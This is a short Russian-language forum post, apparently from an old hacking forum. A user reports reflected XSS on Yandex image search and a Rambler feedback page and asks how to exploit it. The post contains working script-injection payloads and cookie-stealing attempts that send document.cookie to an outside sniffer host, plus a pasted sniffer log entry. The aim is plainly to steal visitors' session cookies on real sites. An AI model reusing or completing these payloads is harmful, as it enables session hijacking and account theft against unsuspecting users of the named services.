уязвимость http://images.yandex.ru/
поиск ввожу </script><script>alert(document.cookie)</script> и появляется алерт пытаюсь сделать скрипт типа <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> тогда ничего не происходит он просто пытается это найти. как правильно использовать данную ксс?
----------------------------------------
на рамблере
ксс http://www.rambler.ru/db/support/feedback.shtml?name="<script >alert()</script>выводит алерт
пытался сделать скрипт типа <script img src="http://s.netsec.ru/mda.gif"> но мне на сниффер приходило только
Time: 20.01 -10.35.48
IP: 80.64.91.1
Host: http://www.rambler.ru/db/support/feedback.shtml?name="<script src="http://s.netsec.ru/frigid20.gif?" document.cookie;></script>
Browser: Mozilla/5.0
как правильно использовать данный ксс?